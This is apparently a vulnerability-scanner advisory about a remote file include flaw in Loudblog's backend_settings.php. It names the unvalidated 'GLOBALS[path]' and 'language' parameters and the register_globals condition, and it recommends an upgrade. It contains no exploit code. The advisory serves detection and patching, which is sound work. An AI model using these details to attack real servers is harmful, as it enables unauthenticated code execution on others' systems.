Family: CGI abuses --> Category: attack
Loudblog backend_settings.php Remote File Include Vulnerability Vulnerability Scan
Vulnerability Scan Summary
Checks for remote file include vulnerability in Loudblog's backend_settings.php
Detailed Explanation for this Vulnerability Test
The remote web server contains a PHP script that is prone to a remote
file include vulnerability.
The remote host is running Loudblog, a PHP application for publishing
podcasts and similar media files.
The installed version of Loudblog fails to validate user input to the
'GLOBALS[path]' and 'language' parameters before using them in the
'loudblog/inc/backend_settings.php' script in a PHP 'include'
function. Provide PHP's 'register_globals' setting is enabled, an
unauthenticated attacker can exploit this flaw to run arbitrary code,
possibly taken from third-party hosts, subject to the rights of
the web server user id.
See also :
Upgrade to Loudblog 0.41 or later.
High / CVSS Base Score : 7.0
Click HERE for more information and discussions on this network vulnerability scan.